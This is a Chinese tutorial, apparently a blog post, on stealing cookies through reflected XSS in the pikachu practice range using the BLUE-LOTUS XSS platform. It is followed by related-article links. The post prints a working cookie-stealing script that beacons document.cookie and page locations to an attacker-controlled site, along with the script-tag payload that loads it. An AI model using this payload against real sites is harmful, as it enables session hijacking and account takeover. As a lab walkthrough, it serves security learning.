XSS平台获取cookie
XSS平台获取cookie
1.环境介绍
- 靶场:pikachu
- XSS平台:BLUE-LOTUS
- 浏览器:谷歌浏览器
2.流程介绍
登录XSS平台,创建获取cookie的脚本
var website = "http://网站地址";
(function() {(new Image()).src = website + '/?keepsession=1&location=' + escape((function() {try {return document.location.href} catch (e) {return ''}})()) + '&toplocation=' + escape((function() {try {return top.location.href} catch (e) {return ''}})()) + '&cookie=' + escape((function() {try {return document.cookie} catch (e) {return ''}})()) + '&opener=' + escape((function() {try {return (window.opener && window.opener.location.href) ? window.opener.location.href : ''} catch (e) {return ''}})());
})();
登录pikachu,选择Cross-Site-Scripting下的反射型XSS(get)
由于输入框在前端进行了长度限制,可以选择检查进行修改
然后再输入框内输入payload
<script src="https:///网站地址/myjs/cookie.js"></script>
执行后就可以在XSS接收面板获取到用户的cookie信息了
3.遇到的问题
由于我自己搭建的平台使用的是https协议,而模板自动生成的是http所以导致不能接收到cookie信息
XSS平台获取cookie相关推荐
- 存储型XSS结合XSS平台获取cookie信息进后台——efucms
百度搜索:efucms-含有存储型XSS漏洞的源码包 下载即可 实验目的:利用存储型XSS获取管理员Cookie信息,修改本地Cookie信息为管理员Cookie,以管理员身份不输入用户名.密码直接登 ...
- 渗透新手福利---xss到获取cookie入门级
CV 新手写第一次写不足还请大佬多多指教,图片上传太麻烦了有的图片上传的位置估计不对,还请大家多多海量 通过对Tips的读取我们明白了这题是一道存储型XSS偷取cookie的题目.(因为flag在co ...
- xss平台打cookie登录后台(保姆级教程)
前言 最新看了一篇hack学习呀[记一次帮助粉丝渗透黑入杀猪盘诈骗的实战]的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xs ...
- html获取cookie_知了汇智《XSS攻击-盗取cookie实战》课程文档讲解
文章来源:知了汇智冯老师 今天是<web安全-XSS攻击>系列的最后一篇啦,希望大家好好学习哦~ XSS之 知了汇智-禁卫实验室(GoDun.F) 1. 编写获取cookie的代码cook ...
- Web安全原理剖析(十八)——XSS平台及漏洞修复建议
目录 5.2 使用XSS平台测试XSS漏洞 5.3 XSS漏洞修复建议 5.2 使用XSS平台测试XSS漏洞 XSS平台可自行本地搭建或使用在线平台. 首先在XSS平台注册账号并登录,单击&q ...
- XSS跨站脚本攻击(DVWA XSS攻击详解、XSS平台搭建)
一.跨站脚本攻击过程 二.XSS攻击定义及危害 三.XSS攻击常见分类 例:反射型 例:存储型 例:DOM型 四.XSS攻击常见编码 例: 编码后: 五.XSS常见测试语句 Script 标签 Scr ...
- XSS平台的简单搭建和获取cookie
搭建蓝莲花XSS平台. 1.什么是XSS平台 XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的 ...
- 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...
- DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面.特点:弹窗警告.广告:javas ...
最新文章
- 以完美主义的名义,拖延症在公开掠夺
- 如何在C语言中巧妙地避免使用if语句?
- 无障碍开发(一)之初认识
- asp.net mvc web api 参数输入多个参数
- 操作系统基本特性——并发、共享、虚拟、异步
- android ListView ListSelector 不起作用(被覆盖)
- jasper 常用知识点总结
- SpringBoot文档翻译系列——26.日志logging
- ThreadLocal到底是什么,尚硅谷docker高级
- asp.net ashx处理程序中switch case的替代方案总结
- 快手用户群体分析_快手发布《2020快手用户及营销报告》
- Android热修复之阿里Sophix的使用详解
- 赛百味的中英文菜单对照
- M - Make Cents?
- DEBIAN_FRONTEND noninteractive参数
- inv如何用计算机计算,计算器INV是用那个键表示的
- 苹果硅之后:PC市场会走向何方?
- Charles的总结使用
- FLEAPHP框架的文件缓存系统
- html中的ol 和li,html中ol标签与li标签的高级应用
热门文章
- linux c语言创建多级目录
- java工程师学python爬虫_Python 爬取 11 万 Java 程序员信息竟有这些重大发现!
- jquery validation engine ajax,validationEngine ajax验证 java
- Python攻城师————MySQL数据库(自增、外键、关键字)
- 方舟服务器在线人数,Steam破2500万玩家,《方舟生存进化》仍居在线人数前十
- Python打包成exe终极方案,赶紧收藏吧
- MGR Switch single-Primary to Muti_primary
- uniapp —— 小程序实现带参分享微信、朋友圈以及调试获取参数
- Mac 小记 — 杂录
- 极致降噪,静听世界——万魔活塞豆降噪版体验评测